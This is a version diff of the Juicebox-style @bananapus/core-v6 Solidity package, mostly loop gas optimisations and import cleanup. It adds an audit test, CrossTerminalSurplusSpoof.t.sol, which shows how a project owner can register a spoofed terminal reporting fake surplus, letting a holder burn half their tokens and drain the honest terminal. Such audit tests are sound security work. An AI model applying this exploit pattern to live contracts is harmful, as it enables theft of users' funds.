@bananapus/core-v6 0.0.31 → 0.0.32

package/src/abstract/JBControlled.sol

@@ -45,10 +45,11 @@ abstract contract JBControlled is IJBControlled {
 
     /// @notice Only allows the controller of the specified project to proceed.
     function _onlyControllerOf(uint256 projectId) internal view {
+        // Cache the controller address to avoid a redundant external call on revert.
         // slither-disable-next-line calls-loop
-        if (address(DIRECTORY.controllerOf(projectId)) != msg.sender) {
-            // slither-disable-next-line calls-loop
-            revert JBControlled_ControllerUnauthorized(address(DIRECTORY.controllerOf(projectId)));
+        address controller = address(DIRECTORY.controllerOf(projectId));
+        if (controller != msg.sender) {
+            revert JBControlled_ControllerUnauthorized(controller);
         }
     }
 }

package/src/libraries/JBMetadataResolver.sol

@@ -214,7 +214,7 @@ library JBMetadataResolver {
         uint256 numberOfDatas = datas.length;
 
         // Add each metadata to the array, each padded to 32 bytes
-        for (uint256 i; i < numberOfDatas; i++) {
+        for (uint256 i; i < numberOfDatas;) {
             metadata = abi.encodePacked(metadata, datas[i]);
             paddedLength = metadata.length % JBMetadataResolver.WORD_SIZE == 0
                 ? metadata.length
@@ -223,6 +223,9 @@ library JBMetadataResolver {
             assembly ("memory-safe") {
                 mstore(metadata, paddedLength)
             }
+            unchecked {
+                ++i;
+            }
         }
     }
 

package/src/libraries/JBPayoutSplitGroupLib.sol

@@ -69,7 +69,7 @@ library JBPayoutSplitGroupLib {
         leftoverAmount = amount;
 
         // Transfer between all splits.
-        for (uint256 i; i < payoutSplits.length; i++) {
+        for (uint256 i; i < payoutSplits.length;) {
             // Get a reference to the split being iterated on.
             JBSplit memory split = payoutSplits[i];
 
@@ -108,6 +108,9 @@ library JBPayoutSplitGroupLib {
                 netAmount: netPayoutAmount,
                 caller: caller
             });
+            unchecked {
+                ++i;
+            }
         }
     }
 

package/src/libraries/JBSurplus.sol

@@ -30,10 +30,13 @@ library JBSurplus {
         uint256 numberOfTerminals = terminals.length;
 
         // Add the current surplus for each terminal.
-        for (uint256 i; i < numberOfTerminals; i++) {
+        for (uint256 i; i < numberOfTerminals;) {
             surplus += terminals[i].currentSurplusOf({
                 projectId: projectId, tokens: tokens, decimals: decimals, currency: currency
             });
+            unchecked {
+                ++i;
+            }
         }
     }
 }

package/test/TestForwardedTokenConsumption.sol

@@ -386,6 +386,7 @@ contract TestForwardedTokenConsumption_Local is TestBaseWorkflow {
         returns (JBFundAccessLimitGroup[] memory)
     {
         JBCurrencyAmount[] memory payoutLimits = new JBCurrencyAmount[](1);
+        // forge-lint: disable-next-line(unsafe-typecast)
         payoutLimits[0] =
             JBCurrencyAmount({amount: uint224(payoutAmount), currency: uint32(uint160(address(usdcToken())))});
 

package/test/audit/CrossTerminalSurplusSpoof.t.sol

@@ -0,0 +1,140 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.6;
+
+import {TestBaseWorkflow} from "../helpers/TestBaseWorkflow.sol";
+import {IJBController} from "../../src/interfaces/IJBController.sol";
+import {IJBDirectory} from "../../src/interfaces/IJBDirectory.sol";
+import {IJBTerminal} from "../../src/interfaces/IJBTerminal.sol";
+import {JBMultiTerminal} from "../../src/JBMultiTerminal.sol";
+import {JBConstants} from "../../src/libraries/JBConstants.sol";
+import {JBAccountingContext} from "../../src/structs/JBAccountingContext.sol";
+import {JBFundAccessLimitGroup} from "../../src/structs/JBFundAccessLimitGroup.sol";
+import {JBRulesetConfig} from "../../src/structs/JBRulesetConfig.sol";
+import {JBRulesetMetadata} from "../../src/structs/JBRulesetMetadata.sol";
+import {JBSplitGroup} from "../../src/structs/JBSplitGroup.sol";
+import {JBTerminalConfig} from "../../src/structs/JBTerminalConfig.sol";
+import {IJBRulesetApprovalHook} from "../../src/interfaces/IJBRulesetApprovalHook.sol";
+
+/// @notice Verifies that `useTotalSurplusForCashOuts` trusts every terminal in the directory,
+/// even though settlement still comes from the specific terminal the holder cashes out through.
+contract CrossTerminalSurplusSpoof_Local is TestBaseWorkflow {
+    IJBController private _controller;
+    IJBDirectory private _directory;
+    JBMultiTerminal private _terminal;
+    address private _projectOwner;
+    address private _holder;
+    uint32 private _nativeCurrency;
+    uint256 private _projectId;
+
+    function setUp() public override {
+        super.setUp();
+
+        _controller = jbController();
+        _directory = jbDirectory();
+        _terminal = jbMultiTerminal();
+        _projectOwner = multisig();
+        _holder = beneficiary();
+        _nativeCurrency = uint32(uint160(JBConstants.NATIVE_TOKEN));
+
+        JBRulesetMetadata memory metadata = JBRulesetMetadata({
+            reservedPercent: 0,
+            cashOutTaxRate: 0,
+            baseCurrency: _nativeCurrency,
+            pausePay: false,
+            pauseCreditTransfers: false,
+            allowOwnerMinting: true,
+            allowSetCustomToken: true,
+            allowTerminalMigration: false,
+            allowSetTerminals: true,
+            allowSetController: false,
+            allowAddAccountingContext: true,
+            allowAddPriceFeed: false,
+            ownerMustSendPayouts: false,
+            holdFees: false,
+            useTotalSurplusForCashOuts: true,
+            useDataHookForPay: false,
+            useDataHookForCashOut: false,
+            dataHook: address(0),
+            metadata: 0
+        });
+
+        JBRulesetConfig[] memory rulesetConfigs = new JBRulesetConfig[](1);
+        rulesetConfigs[0] = JBRulesetConfig({
+            mustStartAtOrAfter: 0,
+            duration: 0,
+            weight: 1000e18,
+            weightCutPercent: 0,
+            approvalHook: IJBRulesetApprovalHook(address(0)),
+            metadata: metadata,
+            splitGroups: new JBSplitGroup[](0),
+            fundAccessLimitGroups: new JBFundAccessLimitGroup[](0)
+        });
+
+        JBAccountingContext[] memory contexts = new JBAccountingContext[](1);
+        contexts[0] = JBAccountingContext({token: JBConstants.NATIVE_TOKEN, decimals: 18, currency: _nativeCurrency});
+
+        JBTerminalConfig[] memory terminalConfigs = new JBTerminalConfig[](1);
+        terminalConfigs[0] = JBTerminalConfig({terminal: _terminal, accountingContextsToAccept: contexts});
+
+        _projectId = _controller.launchProjectFor({
+            owner: _projectOwner,
+            projectUri: "spoofed-surplus",
+            rulesetConfigurations: rulesetConfigs,
+            terminalConfigurations: terminalConfigs,
+            memo: ""
+        });
+    }
+
+    function test_partialCashOutCanDrainLocalTerminalUsingSpoofedSiblingSurplus() external {
+        vm.deal(_holder, 1 ether);
+
+        vm.prank(_holder);
+        uint256 minted = _terminal.pay{value: 1 ether}({
+            projectId: _projectId,
+            token: JBConstants.NATIVE_TOKEN,
+            amount: 1 ether,
+            beneficiary: _holder,
+            minReturnedTokens: 0,
+            memo: "",
+            metadata: ""
+        });
+
+        assertEq(address(_terminal).balance, 1 ether, "terminal should hold the paid ETH");
+
+        address spoofedTerminal = makeAddr("spoofedTerminal");
+        IJBTerminal[] memory terminals = new IJBTerminal[](2);
+        terminals[0] = IJBTerminal(address(_terminal));
+        terminals[1] = IJBTerminal(spoofedTerminal);
+
+        vm.prank(_projectOwner);
+        _directory.setTerminalsOf(_projectId, terminals);
+
+        vm.mockCall(
+            spoofedTerminal,
+            abi.encodeCall(IJBTerminal.currentSurplusOf, (_projectId, new address[](0), 18, _nativeCurrency)),
+            abi.encode(1 ether)
+        );
+
+        uint256 holderBalanceBefore = _holder.balance;
+
+        vm.prank(_holder);
+        uint256 reclaimed = _terminal.cashOutTokensOf({
+            holder: _holder,
+            projectId: _projectId,
+            cashOutCount: minted / 2,
+            tokenToReclaim: JBConstants.NATIVE_TOKEN,
+            minTokensReclaimed: 0,
+            beneficiary: payable(_holder),
+            metadata: new bytes(0)
+        });
+
+        assertEq(reclaimed, 1 ether, "spoofed global surplus should let a half burn reclaim the full local balance");
+        assertEq(_holder.balance - holderBalanceBefore, 1 ether, "holder should receive the full terminal balance");
+        assertEq(address(_terminal).balance, 0, "the honest terminal should be fully drained");
+        assertEq(
+            jbTokens().totalBalanceOf(_holder, _projectId),
+            minted / 2,
+            "the holder should keep half their project tokens after draining the terminal"
+        );
+    }
+}

package/test/units/static/JBController/TestPreviewMintOf.sol

@@ -1,7 +1,6 @@
 // SPDX-License-Identifier: MIT
 pragma solidity 0.8.28;
 
-import {JBController} from "../../../../src/JBController.sol";
 import {IJBRulesetApprovalHook} from "../../../../src/interfaces/IJBRulesetApprovalHook.sol";
 import {IJBRulesets} from "../../../../src/interfaces/IJBRulesets.sol";
 import {JBConstants} from "../../../../src/libraries/JBConstants.sol";

package/test/units/static/JBMultiTerminal/TestCashOutTokensOf.sol

@@ -5,7 +5,6 @@ import {MockERC20} from "../../../mock/MockERC20.sol";
 import {JBMultiTerminal} from "../../../../src/JBMultiTerminal.sol";
 import {JBPermissioned} from "../../../../src/abstract/JBPermissioned.sol";
 import {IJBCashOutHook} from "../../../../src/interfaces/IJBCashOutHook.sol";
-import {IJBCashOutTerminal} from "../../../../src/interfaces/IJBCashOutTerminal.sol";
 import {IJBController} from "../../../../src/interfaces/IJBController.sol";
 import {IJBDirectory} from "../../../../src/interfaces/IJBDirectory.sol";
 import {IJBFeelessAddresses} from "../../../../src/interfaces/IJBFeelessAddresses.sol";